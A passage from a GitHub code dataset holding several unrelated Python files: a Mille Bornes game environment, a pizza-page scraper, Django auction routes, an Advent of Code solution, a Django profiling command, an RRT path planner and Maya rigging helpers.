self.extension_team:\n player_representative = [p for p in self.players if p.team == t][0]\n action_history_add.append([player_representative, [], -1, 200])\n \n # Add reward points if Shut-out (500)\n shut_out_achieved = True\n for t in self.teams:\n if t != self.player_current.team and t.distance_points > 0:\n shut_out_achieved = False\n break\n \n if shut_out_achieved == True:\n action_history_add[0][3] += 500\n \n # Add reward points if delayed action (300)\n if len(self.deck.cards) == 0:\n action_history_add[0][3] += 300\n \n # Add reward points if safe trip (no 200's) (300)\n if self.player_current.team.distance_200 == 0:\n action_history_add[0][3] += 300\n \n # Set the Game Over variable\n self.play_status = 4\n \n elif team_points == 1000:\n # End Game: Team has reached 1,000 points\n \n # Add reward points for: trip completed (400)\n action_history_add[0][3] += 400\n\n # Add reward points if Shut-out (500)\n shut_out_achieved = True\n for t in self.teams:\n if t != self.player_current.team and t.distance_points > 0:\n shut_out_achieved = False\n break\n\n if shut_out_achieved == True:\n action_history_add[0][3] += 500\n\n # Add reward points if delayed action (300)\n if len(self.deck.cards) == 0:\n action_history_add[0][3] += 300\n\n # Add reward points if safe trip (no 200's) (300)\n if self.player_current.team.distance_200 == 0:\n action_history_add[0][3] += 300\n\n # Set the Game Over variable\n self.play_status = 4\n \n elif action[1] == \"Remedy\":\n # Remedy type: Speed or Battle\n if action[2] == \"End of Limit\":\n # Add card to team's Speed Pile\n self.player_current.team.speed_pile.append(played_card)\n \n # Update team's Speed status\n self.player_current.team.speed_status = 0\n \n else:\n # Add card to team's Battle Pile\n self.player_current.team.battle_pile.append(played_card)\n \n # Update team's Battle status\n if action[2] == \"Roll\" or 'Right-of-Way' in self.player_current.team.safety_played:\n self.player_current.team.battle_status = 4\n else:\n self.player_current.team.battle_status = 3\n \n elif action[1] == \"Hazard\":\n # Team receiving hazard\n team_hazard = self.teams[action[0]]\n \n if action[2] == \"Speed Limit\":\n # Add card to team's Speed Pile\n team_hazard.speed_pile.append(played_card)\n \n # Update team's Speed status\n team_hazard.speed_status = 1\n \n else:\n # Add card to team's Battle Pile\n team_hazard.battle_pile.append(played_card)\n \n # Update team's Battle status\n team_hazard.battle_status = [\"Out of Gas\", \"Flat Tire\", \"Accident\", \"Stop\"].index(action[2])\n \n # Coup Fourre check - setup variable to begin the process of checking for coup fourre\n self.play_status = 1\n self.coup_fourre_player = self.player_current\n self.coup_fourre_team = team_hazard\n self.coup_fourre_hazard = action[2]\n \n elif action[1] == \"Safety\" or action[1] == \"Coup Fourre\":\n # Safety played (Coup Fourre logic is similar, using same code block to reduce redundant code)\n \n if action[2] != \"Do not play\":\n # A Safety or Coup Fourre has been played\n \n # Add card to team's safety pile\n self.player_current.team.safety_pile.append(played_card)\n \n # Add the card's value to the team's safety played\n self.player_current.team.safety_played.append(action[2])\n \n # Add reward points for safety played (100)\n action_history_add[0][3] += 100\n \n # Add reward points if all 4 safeties played by this team (300)\n if len(self.player_current.team.safety_played) == 4:\n action_history_add[0][3] += 300\n \n # Process the Speed Pile/Status (only for \"Right-of-Way\")\n if action[2] == \"Right-of-Way\" and self.player_current.team.speed_status == 1:\n # Top card of speed pile is a Speed Limit, it is possible, however, there are multiple Speed Limit card's stacked\n while len(self.player_current.team.speed_pile) > 0 and self.player_current.team.speed_pile[-1].value == \"Speed Limit\":\n self.deck.cards_discard.append(self.player_current.team.speed_pile.pop())\n\n # Team should no longer have a Speed Limit applied\n self.player_current.team.speed_status = 0\n\n # Process the Battle Pile/Status\n battle_pile_process = True\n\n while battle_pile_process:\n # Are there cards left?\n if len(self.player_current.team.battle_pile) > 0:\n top_card = self.player_current.team.battle_pile[-1]\n \n # Is the top card a Remedy?\n if top_card.type == \"Remedy\":\n # Team can \"Go\" (whatever last issue was, it was fixed)\n self.player_current.team.battle_status = 4\n battle_pile_process = False\n else:\n # Top Card is a Hazard, Does the team have the corresponding Safety\n safety_value = safety_counter(top_card.value)\n if safety_value in self.player_current.team.safety_played:\n # Remove the card and keep processing\n self.deck.cards_discard.append(self.player_current.team.battle_pile.pop())\n else:\n # Team does not have a Safety, the hazard applies\n self.player_current.team.battle_status = [\"Out of Gas\", \"Flat Tire\", \"Accident\", \"Stop\"].index(top_card.value)\n battle_pile_process = False\n else:\n # No more cards left to process, team can \"Go\"\n self.player_current.team.battle_status = 4\n battle_pile_process = False\n \n # Was the Safety played as a Coup Fourre?\n if action[1] == \"Coup Fourre\":\n # Add reward points for Coup Fourre\n action_history_add[0][3] += 300\n \n # Player now has one less card, immediately draw a card\n self.player_current.draw(self.deck)\n \n # Set all coup fourre variables to None (clear the coup fourre check)\n self.coup_fourre_player = None\n self.coup_fourre_team = None\n self.coup_fourre_hazard = None\n \n # Player get's a bonus turn\n self.play_status = 3\n \n elif action[1] == \"Extension\":\n # Player has responded to Extension option\n \n if action[2] == \"Yes\":\n # Extension mode should be enabled\n self.extension_team = self.player_current.team\n \n else:\n # End Game: Player does not want to enter extension, end of game has been reached\n \n # Add reward points for: trip completed (400)\n action_history_add[0][3] += 400\n\n # Add reward points if Shut-out (500)\n shut_out_achieved = True\n for t in self.teams:\n if t != self.player_current.team and t.distance_points > 0:\n shut_out_achieved = False\n break\n\n if shut_out_achieved == True:\n action_history_add[0][3] += 500\n\n # Add reward points if delayed action (300)\n if len(self.deck.cards) == 0:\n action_history_add[0][3] += 300\n\n # Add reward points if safe trip (no 200's) (300)\n if self.player_current.team.distance_200 == 0:\n action_history_add[0][3] += 300\n\n # Set the Game Over variable\n self.play_status = 4\n \n # Store action history\n self.action_history.extend(action_history_add)\n \n # Move to next player (or End Game)\n if self.play_status < 4:\n # Ensure there are either cards left in the deck or at least one player has a card left in their hand\n if len(self.deck.cards) > 0 or sum([len(p.hand) for p in self.players]) > 0:\n self.start_turn()\n else:\n # Game Over (no more plays possible)\n self.play_status = 4\n \n def final_team_points(self):\n \"\"\"\n Return a list of final points by team\n \"\"\"\n \n team_points = [0 for i in range(len(self.teams))]\n \n for act in self.action_history:\n team_idx = self.teams.index(act[0].team)\n team_points[team_idx] += act[3]\n \n return team_points\n \n def state(self):\n \"\"\"\n Return the state for the current player\n \n List structure (by index) - shape(32,)\n 0 Number of players (2, 3, 4, 6)\n 1 Game play status (0 = Normal; 1 = Coup Fourre check; 2 = Extension check; 3 = Bonus turn)\n 2 Extension team (-1 = Not in extension play; 0-2 = Team index who called for an extension)\n 3 Current player team number index (0, 1, 2)\n 4 Number of cards left in deck (unplayed; recognition this is not an infinite horizon)\n 5-15 Action (index) history taken by other players prior to the current player's turn (-1 for n/a) most recent action first (reverse order)\n 16 Team 1 Speed Status (0 = No speed limit; 1 = Speed Limit)\n 17 Team 1 Battle Status (0 = Out of Gas; 1 = Flat Tire; 2 = Accident; 3 = Stop; 4 = Go)\n 18 Team 1 Distance points\n 19 Team 1 Number of 200 distance point cards played (0, 1, 2)\n 20 Team 1 Extra Tank (0 = No; 1 = Yes)\n 21 Team 1 Puncture Proof (0 = No; 1 = Yes)\n 22 Team 1 Driving Ace (0 = No; 1 = Yes)\n 23 Team 1 Right-of-Way (0 = No; 1 = Yes)\n 24-31 Team 2 (same as Team 1)\n 32-39 Team 3 (same as Team 1) (-1 for n/a)\n 40-46 Cards (index) in current player hand (-1 for n/a)\n \n Notes:\n The following game elements are not included in the state. I am beginning with \"minimal\" information at first.\n \n A key strategy is counting cards, for example, counting number of \"Accident\" cards already played. This can influence discarding extra Repairs remedy cards.\n Currently, this is not explicitly in the State\n The prior actions taken since last turn is in the State, the model could potentially learn from this component of state\n \n Another important component of the game is to know the relationship among cards (e.g. Out of Gas > Gasoline > Extra Tank).\n I am not certain if/how to model this to assist with training an optimal policy\n\n \"\"\"\n \n state_list = [-1] * 47\n \n # Number of players\n state_list[0] = len(self.players)\n \n # Game play status\n state_list[1] = self.play_status\n \n # Extension team\n state_list[2] = -1 if self.extension_team is None else self.teams.index(self.extension_team)\n \n # Current Player's Team Index\n state_list[3] = self.teams.index(self.player_current.team)\n \n # Number of cards left in deck\n state_list[4] = len(self.deck.cards)\n \n # Action History since player's last turn\n i = 5\n for act in reversed(self.action_history):\n if act[0] == self.player_current:\n break\n else:\n state_list[i] = act[2]\n i += 1\n \n # Teams info\n i = 16\n for t in self.teams:\n state_list[i] = t.speed_status\n i += 1\n state_list[i] = t.battle_status\n i += 1\n state_list[i] = t.distance_points\n i += 1\n state_list[i] = t.distance_200\n i += 1\n state_list[i] = 1 if \"Extra Tank\" in t.safety_played else 0\n i += 1\n state_list[i] = 1 if \"Puncture-Proof\" in t.safety_played else 0\n i += 1\n state_list[i] = 1 if \"Driving Ace\" in t.safety_played else 0\n i += 1\n state_list[i] = 1 if \"Right-of-Way\" in t.safety_played else 0\n i += 1\n \n # Cards in current player's hand\n i = 40\n for c in self.player_current.hand:\n state_list[i] = self.card_matrix.index([c.type, c.value])\n i += 1\n \n return state_list\n ","repo_name":"JMBoggess/Mille-Bornes","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":43282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9848702539","text":"from bs4 import BeautifulSoup\n\n\ndef getPizzas():\n with open('home.html', 'r') as html_file:\n content = html_file.read()\n beautiful_soup = BeautifulSoup(content, 'html.parser')\n pizza_cards = beautiful_soup.find_all('div', class_='card')\n for index, pizza in enumerate(pizza_cards):\n pizza_name = pizza.h5.text\n pizza_price = pizza.a.text.split(' ')[-1]\n with open(f'pizza_info/{index}.txt', 'w') as files:\n files.write(f'{pizza_name} goes for price {pizza_price}')\n\n\nif __name__ == '__main__':\n getPizzas()\n","repo_name":"Kymoraa/web_scraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26125830579","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"create_listing\", views.create_listing, name='createlisting'),\n path(\"item=\", views.item_detail, name='item_detail'),\n path(\"close_bid/item=\", views.close_bid, name='close_bid'),\n path(\"add_comment/item=\", views.add_comment, name='add_comment'),\n path(\"closed_listing\", views.closed_listing, name='closed_listing'),\n path(\"add_watchlist/item=\", views.add_watchlist, name='add_watchlist'),\n path(\"remove_watchlist/item=\", views.remove_watchlist, name='remove_watchlist'),\n path(\"watchlist\", views.view_watchlist, name='view_watchlist'),\n path(\"categories\", views.categories, name='categories'),\n path(\"category=\", views.category_listing, name='category_listing')\n]\n","repo_name":"FuadGoloba/Havard-CS50W-Django-Projects","sub_path":"Project 2 - Commerce/commerce/commerce/auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"512546349","text":"inp = 368078\nimport collections\ndata = collections.defaultdict(dict)\n\ndef calc_coords(n):\n if n < 1:\n raise ValueError(\"N must be 1 or higher\")\n max_x = 0\n max_y = 0\n curr_x = 0\n curr_y = 0\n x_direction = \"right\"\n y_direction = \"up\"\n first_bigger = True\n\n for i in range(n-1):\n #print(\"State: mx:{} my:{} cx:{} cy:{} xd:{} yd:{}\".format(max_x, max_y, curr_x, curr_y, x_direction, y_direction))\n \n # Assign data as sum of surrounding blocks\n sum_data = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n try:\n sum_data += data[curr_x+x][curr_y+y]\n except KeyError:\n pass\n if curr_x == 0 and curr_y == 0:\n sum_data = 1\n data[curr_x][curr_y] = sum_data\n if first_bigger and sum_data > n:\n print(\"Value written {} was first bigger than input {}\".format(sum_data, n))\n first_bigger = False\n\n if x_direction == \"right\" and y_direction == \"up\":\n # Going right on the bottom\n if curr_x <= max_x:\n if curr_x == max_x:\n max_x += 1\n x_direction = \"left\"\n curr_x += 1\n else:\n raise ValueError(\"Maximum x was {} but current x was {}!\".format(max_x, curr_x))\n elif x_direction == \"right\" and y_direction == \"down\":\n # Going down on the left side\n if curr_y > -max_y:\n if curr_y == -(max_y-1):\n y_direction = \"up\"\n curr_y -= 1\n else:\n raise ValueError(\"Minimum y was {} but current y was {}\".format(-max_y, curr_y))\n elif x_direction == \"left\" and y_direction == \"up\":\n # Going up on the right side\n if curr_y <= max_y:\n if curr_y == max_y:\n max_y += 1\n y_direction = \"down\"\n curr_y += 1\n else:\n raise ValueError(\"Maximum y was {} but current y was {}\".formay(max_y, curr_y))\n elif x_direction == \"left\" and y_direction == \"down\":\n # Going left on the top\n if curr_x > -max_x:\n if curr_x == -(max_x-1):\n x_direction = \"right\"\n curr_x -= 1\n else:\n raise ValueError(\"Minimum x was {} but current x was {}\".format(-max_x, curr_x))\n else:\n raise ValueError(\"Impossible situation! xdir: {} ydir: {}\".format(x_direction, y_direction))\n\n print(\"{} is at coordinates {},{}\".format(n, curr_x, curr_y))\n return curr_x, curr_y\n\n\ndef manhattan_distance(x, y):\n # Calculate manhattan distance between input and 0,0\n return abs(x)+abs(y)\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) > 1:\n inp = int(sys.argv[1])\n x, y = calc_coords(inp)\n\n print(\"Manhattan distance = {}\".format(manhattan_distance(x, y)))\n\n","repo_name":"Kurocon/AdventOfCode2017","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3065106272","text":"from django.core.management.base import BaseCommand\nfrom django.core.management import call_command\nimport json\nfrom django.conf import settings\nimport requests\nfrom django.test.client import Client\nimport logging\nfrom django_web_profiler.models import ProfileLog, ProfileLogRecord\nimport collections\nfrom datetime import datetime\n\n\nclass Command(BaseCommand):\n args = ''\n help = 'Loads the initial data in to database'\n\n def handle(self, *args, **options):\n client = Client()\n logger1 = logging.getLogger(\"request-logging\")\n profile_log = ProfileLog.objects.create(name=datetime.now(), start_time=datetime.now())\n\n for url in settings.URLS:\n response = client.get(url, DJANGO_DEBUG_LOGGING=True)\n request = response.wsgi_request\n statistics = request.statistics\n total_time = total_user_cpu_time = total_system_cpu_time = total_sql_time = 0.0\n total_sql_queries = total_cache_hits = total_cache_misses = 0\n\n if settings.DEBUG:\n cache_calls = {k:i for i,k in enumerate(statistics['cache_counts'])}\n\n total_time += statistics['total_cpu_time']\n total_user_cpu_time += statistics['user_cpu_time']\n total_system_cpu_time += statistics['system_cpu_time']\n total_sql_time += statistics['sql_total_time']\n total_sql_queries += statistics['num_queries']\n total_cache_hits += statistics['cache_total_calls']\n total_cache_misses += statistics['cache_misses']\n ProfileLogRecord.objects.create(profile_log=profile_log, request_path=statistics['path'], ip_address=statistics['ip_address'], device=statistics['device'],\n timer_utime=statistics['user_cpu_time'], timer_stime=statistics['system_cpu_time'], timer_cputime=statistics['total_cpu_time'],\n sql_num_queries=statistics['num_queries'], sql_time=statistics['sql_total_time'], sql_queries=statistics['num_queries'],\n cache_num_calls=statistics['cache_total_calls'], cache_time=statistics['cache_total_time'], cache_hits=statistics['cache_hits'], cache_misses=statistics['cache_misses'],\n cache_sets=cache_calls['set'], cache_gets=cache_calls['get'], cache_get_many=cache_calls['get_many'], cache_deletes=cache_calls['delete'], cache_calls=statistics['cache_total_calls'])\n\n else:\n total_time += float(statistics['total_cpu_time'])\n total_user_cpu_time += float(statistics['user_cpu_time'])\n total_system_cpu_time += float(statistics['system_cpu_time'])\n\n ProfileLogRecord.objects.create(profile_log=profile_log, request_path=statistics['path'], ip_address=statistics['ip_address'], device=statistics['device'],\n timer_utime=statistics['user_cpu_time'], timer_stime=statistics['system_cpu_time'], timer_cputime=statistics['total_cpu_time'])\n profile_log_records = ProfileLogRecord.objects.filter(profile_log=profile_log)\n profile_log.total_requests = len(settings.URLS)\n profile_log.avg_time = (total_time/len(settings.URLS))\n profile_log.total_time = total_time\n profile_log.avg_cpu_time = total_user_cpu_time/len(settings.URLS)\n profile_log.total_user_cpu_time = total_user_cpu_time\n profile_log.total_system_cpu_time = total_system_cpu_time\n profile_log.end_time = datetime.now()\n profile_log.save()\n\n result = {'message': \"Successfully Loading initial data\"}\n\n return json.dumps(result)\n","repo_name":"MicroPyramid/django-web-profiler","sub_path":"django_web_profiler/management/commands/logging_urls.py","file_name":"logging_urls.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"72"} +{"seq_id":"74271097192","text":"# This code is distributed WITHOUT ANY WARRANTY, without the implied\n# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU Lesser General Public License for more details.\n \n# The license is distributed along with this repository or you can check\n# for more details.\n\n# Contributors: \n# marcos-pereira (https://github.com/marcos-pereira)\n\nfrom abc import ABC, abstractmethod\nimport numpy as np\nimport random\nfrom rtree import index\n\nclass RRTPlanner(ABC):\n def __init__(self,\n x_init,\n x_goal,\n goal_radius,\n steer_delta,\n scene_map,\n max_num_nodes):\n \"\"\" Return RRTPlanner object. These planners were implement or are inspired by the\n algorithms from the paper:\n S. Karaman and E. Frazzoli, “Sampling-based algorithms for optimal motion planning,” \n The International Journal of Robotics Research, vol. 30, no. 7, pp. 846–894, 2011, doi: 10.1177/0278364911406761.\n\n Args:\n x_init (tuple): the initial node configuration.\n x_goal (tuple): the goal node configuration.\n goal_radius (double): the radius of a ball around the goal to be considered\n at the goal.\n steer_delta (int): the step size in pixels when going from a node in the tree\n towards a new sampled node.\n scene_map (numpy matrix): the scene map where 0 indicate free space and 1 indicate obstacles.\n max_num_nodes (int): the maximum number of nodes to run the planner.\n \"\"\"\n self.x_init_ = x_init\n self.x_goal_ = x_goal\n self.goal_radius_ = goal_radius\n self.steer_delta_ = steer_delta\n self.max_num_nodes_ = max_num_nodes\n self.scene_map_ = scene_map\n\n self.map_height_, self.map_width_ = self.scene_map_.shape\n \n # interleaved True: requires coordinates as [xmin ymin, xmax ymax]\n # See: https://rtree.readthedocs.io/en/latest/class.html#rtree.index.Property\n # index.Property: inherits some instation properties:\n # See: https://rtree.readthedocs.io/en/latest/class.html#rtree.index.Property\n self.nodes_ = index.Index(interleaved=True, properties=index.Property())\n\n ## Used to get nearest neighbors using KDtree\n self.nodes_list_ = list()\n self.nodes_list_.append(self.x_init_)\n \n self.node_count_ = 1\n\n self.edges_ = set()\n\n ## Initialize costs map\n self.node_to_cost_ = dict()\n self.node_to_cost_[self.x_init_] = 0\n\n ## Initialize parent map\n self.node_to_parent_ = dict()\n self.node_to_parent_[self.x_init_] = self.x_init_\n\n ## Initalize graph\n self.rrt_graph_ = (self.nodes_, self.edges_)\n \n x_init_id = 0\n self.insert_node_to_tree(x_init, x_init_id)\n \n ## Used to detect collisions with obstacles\n self.ones_in_drawing_ = np.where(self.scene_map_ == 1)\n self.obstacles_coordinates_ = set(zip(self.ones_in_drawing_[1], self.ones_in_drawing_[0]))\n \n ## Initialize path to goal empty\n self.path_ = list()\n \n ## New point to add to tree\n self.x_new_ = tuple()\n \n ## Store if path was found\n self.path_found_ = False\n \n @abstractmethod\n def plan_found(self):\n \"\"\"Return if the plan is found.\n \"\"\"\n pass\n \n @abstractmethod\n def run(self):\n \"\"\"Run the planner until the path to goal is found.\n \"\"\"\n pass\n \n @abstractmethod\n def run_step(self):\n \"\"\"Run only one step of the planner.\n \"\"\"\n pass\n \n def run_test(self):\n \"\"\" Run the planner on the loaded map with no visualization.\n \"\"\"\n path_found = False\n while True:\n self.run_planner_step()\n \n path_found = self.path_to_goal_found()\n \n if self.max_number_nodes() == True:\n break\n \n if path_found == True:\n print(\"Path to goal found!\")\n break\n \n def path_to_goal_found(self, x_new, x_goal, goal_radius):\n \"\"\" Returns if the path to goal was found.\n\n Args:\n x_new (_type_): is the new node added to the tree.\n x_goal (_type_): is the goal node in the map.\n goal_radius (_type_): is the radius that considers the\n goal node was reached.\n\n Returns:\n bool: True if the path was found, false otherwise.\n \"\"\"\n path_found = False\n \n ## Check if goal radius was reached\n if self.nodes_distance(x_new, x_goal) < goal_radius:\n print(\"Goal node radius reached!\") \n \n path_found = True\n \n return path_found\n \n def max_number_nodes(self):\n \"\"\" Check if maximum number of nodes was reached.\n\n Returns:\n bool: True if maximum number of nodes was reached.\n \"\"\"\n \n max_number_nodes_reached = False\n \n if self.node_count_ >= self.max_num_nodes_:\n print(\"Maximal number of nodes in tree reached!\")\n print(\"Input anything and press enter to quit.\")\n max_number_nodes_reached = True\n \n return max_number_nodes_reached\n else:\n return max_number_nodes_reached\n \n def sample_space(self, x_max, y_max):\n \"\"\" Sample the configuration space with limits x_max and y_max.\n\n Args:\n x_max (int): the maximum x coordinate.\n y_max (int): the maximum y coordinate.\n\n Returns:\n tuple: the sampled tuple configuration.\n \"\"\"\n x = random.randint(0, x_max)\n y = random.randint(0, y_max)\n\n x_rand = (x, y)\n\n return x_rand\n \n def nodes_distance(self, node1, node2):\n \"\"\" Returns the distance between node1 and node2.\n\n Args:\n node1 (tuple): the first node.\n node2 (tuple): the second node.\n\n Returns:\n double: the norm of the vector between node2 and node1.\n \"\"\"\n p1 = np.array([node1[0], node1[1]])\n p2 = np.array([node2[0], node2[1]])\n distance = np.linalg.norm(p1 - p2)\n\n return distance\n \n def steer(self, node1, node2, delta):\n \"\"\" Returns a node between node1 and node2. If they are close by delta, then \n return node2.\n\n Args:\n node1 (tuple): the initial node.\n node2 (tuple): the goal node towards which we steer.\n delta (double): the minimum distance to consider already near enough to node2.\n\n Returns:\n tuple: the new node between node1 and node2. \n \"\"\"\n node1 = np.array([node1[0], node1[1]])\n node2 = np.array([node2[0], node2[1]])\n if self.nodes_distance(node1, node2) < delta:\n node = node2\n else:\n diffnodes = node2 - node1\n diffnodes = diffnodes/self.nodes_distance(node1, node2)\n node = node1 + delta*diffnodes\n\n # Convert to int, otherwise the maps will not work with double precision\n # TODO: use some better mapping like a hash function to avoid this problem\n node = tuple(int(element) for element in node)\n\n return node\n\n def linear_interpolation(self, node1, node2, delta):\n \"\"\"Do a linear interpolation between the node1 and node2\n using the interpolation factor delta if no collision occurs\n between node1 and node2.\n\n Args:\n node1 (tuple): the source node.\n node2 (tuple): the destination node.\n delta (double): the interpolation factor that must be in the interval [0,1].\n\n Returns:\n tuple: the last node of the interpolation.\n \"\"\"\n \n node1 = np.array([node1[0], node1[1]])\n node2 = np.array([node2[0], node2[1]])\n\n for interpolation_factor in np.arange(0, 1, delta):\n node = node1*interpolation_factor + (1-interpolation_factor)*node2\n node = tuple(element for element in node) \n if self.collision(node) == True:\n return False \n \n # Convert to int, otherwise the maps will not work with double precision\n # TODO: use some better mapping like a hash function to avoid this problem\n node = tuple(int(element) for element in node)\n \n return node\n \n def path(self, node):\n \"\"\" Get path from node to initial node using the map node_to_parent. \n Return also the path cost.\n\n Returns:\n list: list of tuples that associate the node and its parent node.\n doube: path cost.\n \"\"\"\n\n ## Current node starts as the last node of the trajectory\n current_node = node\n \n path = list()\n\n while True:\n ## Add tuple of current node to the path\n path.append(current_node)\n\n ## Current node become its parent, we are searching for a path\n ## backwards in the tree\n current_node = self.node_to_parent_[current_node]\n\n ## If x_init is reached\n if current_node[0] == self.x_init_[0] and \\\n current_node[1] == self.x_init_[1]:\n break\n \n path_cost = self.cost_to_node(node)\n\n return path, path_cost\n \n def nearest_node(self, current_node, rrt_graph):\n \"\"\" Get nearest node to current node in the rrt_graph.\n\n Args:\n current_node (tuple): the current node.\n rrt_graph (rtree index): the rrt graph.\n\n Returns:\n tuple: the nearest node to current_node.\n \"\"\"\n \n # Number of nearest neighbors to query\n num_nearest_neighbors = 1\n \n # The raw object is the node itself as it was inserted in the rtree\n return_raw_object_from_rtree = \"raw\"\n \n # Get the nearest node (the first element of the rrt_graph is the node tree)\n nearest_node_pair = rrt_graph[0].nearest(current_node, num_results=num_nearest_neighbors, objects=return_raw_object_from_rtree)\n nearest_node_pair_as_list = list(nearest_node_pair)\n \n return nearest_node_pair_as_list[0]\n\n def configuration_in_free_space(self):\n \"\"\"Get a configuration in the free configuration space.\n\n Returns:\n tuple: the configuration in the configuration free space.\n \"\"\"\n ## Sample configuration in space\n x_rand = self.sample_space(self.map_width_, self.map_height_)\n \n # Sample until no collision occurs\n while x_rand in self.obstacles_coordinates_:\n x_rand = self.sample_space(self.map_width_, self.map_height_)\n \n return x_rand\n \n def cost_to_node(self, node): \n \"\"\" Return the cost from initial node in the tree to the node.\n\n Args:\n node (tuple): the node to be added to tree.\n\n Returns:\n double: the cost from initial node in the tree to the node.\n \"\"\"\n parent_node = self.node_to_parent_[node]\n cost_to_parent = self.node_to_cost_[parent_node]\n cost_parent_to_node = self.nodes_distance(parent_node, node)\n cost = cost_to_parent + cost_parent_to_node\n \n return cost\n\n def collision(self, node):\n \"\"\" Check if node is in collision. First the node is converted to integers\n because the configuration space is discretized into integers.\n\n Args:\n node (tuple): The node to check if collides with obstacles.\n\n Returns:\n bool: True if in collision, false otherwise.\n \"\"\"\n node_integers = tuple(int(element) for element in node)\n if node_integers in self.obstacles_coordinates_:\n return True\n else:\n return False\n \n def insert_node_to_tree(self, node, node_id=0):\n \"\"\" Insert node to rrt_tree node tree.\n\n Args:\n node (tuple): the node to be inserted to the rrt_tree node tree.\n node_id (int): the id of the inserted node.\n \"\"\"\n \n # The rtree requires the doubled coordinates of the object to be stored\n # See the insert documentation: https://rtree.readthedocs.io/en/latest/class.html#rtree.index.Property\n node_coordinates_doubled = node + node\n \n # The first element of the rrt_graph is the node tree\n self.rrt_graph_[0].insert(node_id, node_coordinates_doubled, node)\n \n def add_edge(self, node1, node2):\n \"\"\" Add edge from node 1 to node 2 in the rrt_graph.\n\n Args:\n node1 (tuple): The first node.\n node2 (tuple): The second node.\n \"\"\"\n \n # The second element of rrt_graph is the edge list\n self.rrt_graph_[1].add((node1, node2))\n \n def get_graph(self):\n \"\"\"Return the RRT graph.\n \"\"\"\n \n return self.rrt_graph_","repo_name":"marcos-pereira/rrt-motion-planner","sub_path":"python-scripts/RRTPlanner.py","file_name":"RRTPlanner.py","file_ext":"py","file_size_in_byte":13197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41026388961","text":"\nimport maya.OpenMaya as om\n\nimport maya.cmds as cmds\n\nfrom ooutdmaya.rigging.core.util import lib, names\n\n\ndef constraintTrsToClosest(srcTrsList, destTrsList):\n \"\"\"\n parent constrains the supplied source transforms (srcTrsList)\n to the nearest transform in the supplied destination transforms (destTrsList)\n \"\"\"\n for transform in srcTrsList:\n # get the closest transform for orient constraining\n closestTrs = lib.closestTransform(transform, destTrsList)\n cmds.parentConstraint(closestTrs, transform, mo=1)\n\n\ndef attachTransformsToCurve(curve, transformList, orientTrsList):\n crvShape = cmds.listRelatives(curve, ad=1, type='nurbsCurve')[0]\n crvShapeAttr = '{0}.create'.format(crvShape)\n npoc = cmds.createNode('nearestPointOnCurve')\n destAttr = '{0}.inputCurve'.format(npoc)\n cmds.connectAttr(crvShapeAttr, destAttr, f=1)\n cvi = cmds.createNode('curveInfo', n='{0}_CVI'.format(curve))\n destAttr = '{0}.inputCurve'.format(cvi)\n cmds.connectAttr(crvShapeAttr, destAttr, f=1)\n arcLen = cmds.getAttr('{0}.arcLength'.format(cvi))\n mdn = cmds.createNode('multiplyDivide', n='{0}_MDN'.format(curve))\n cmds.setAttr('{0}.operation'.format(mdn), 2)\n cmds.connectAttr('{0}.arcLength'.format(cvi), '{0}.input2X'.format(mdn))\n cmds.setAttr('{0}.input1X'.format(mdn), arcLen)\n\n for transform in transformList:\n # get the closest transform for orient constraining\n closestTrs = closestTransform(transform, orientTrsList)\n # closest point on curve info\n pci = cmds.createNode('pointOnCurveInfo', n='{0}_PCI'.format(transform.replace('_GRP', 'Grp')))\n cmds.setAttr('{0}.turnOnPercentage'.format(pci), 1)\n mdl = cmds.createNode('multDoubleLinear', n='{0}_MDL'.format(transform.replace('_GRP', 'Grp')))\n cmds.connectAttr('{0}.outputX'.format(mdn), '{0}.input1'.format(mdl))\n destAttr = '{0}.inputCurve'.format(pci)\n cmds.connectAttr(crvShapeAttr, destAttr, f=1)\n pos = cmds.xform(transform, q=1, ws=1, rp=1)\n # update nearest point on curve to get param\n cmds.setAttr('{0}.inPosition'.format(npoc), pos[0], pos[1], pos[2])\n param = cmds.getAttr('{0}.parameter'.format(npoc))\n cmds.setAttr('{0}.input2'.format(mdl), param)\n # cmds.setAttr('{0}.parameter'.format(pci), param)\n cmds.connectAttr('{0}.output'.format(mdl), '{0}.parameter'.format(pci))\n pciGrp = cmds.createNode('transform', n='{0}_GRP'.format(transform.replace('_GRP', 'GrpPci')))\n cmds.connectAttr('{0}.positionX'.format(pci), '{0}.tx'.format(pciGrp))\n cmds.connectAttr('{0}.positionY'.format(pci), '{0}.ty'.format(pciGrp))\n cmds.connectAttr('{0}.positionZ'.format(pci), '{0}.tz'.format(pciGrp))\n cmds.parent(pciGrp, cmds.listRelatives(transform, parent=1)[0])\n cmds.orientConstraint(closestTrs, pciGrp, mo=1)\n cmds.parentConstraint(pciGrp, transform, mo=1)\n cmds.delete(npoc)\n \ndef getDagPath(node=None):\n sel = om.MSelectionList()\n sel.add(node)\n d = om.MDagPath()\n sel.getDagPath(0, d)\n return d\n\ndef getLocalOffset(parent, child):\n parentWorldMatrix = getDagPath(parent).inclusiveMatrix()\n childWorldMatrix = getDagPath(child).inclusiveMatrix()\n return childWorldMatrix * parentWorldMatrix.inverse()\n \ndef matrixConstraint(master, slave, mode=\"create\", maintainOffset=False):\n \"\"\"Creates a matrix constraint between the master and slave targets\n \n TODO:\n [] Add offset\n [] Prep for joints\n [] Fix remove function (Do 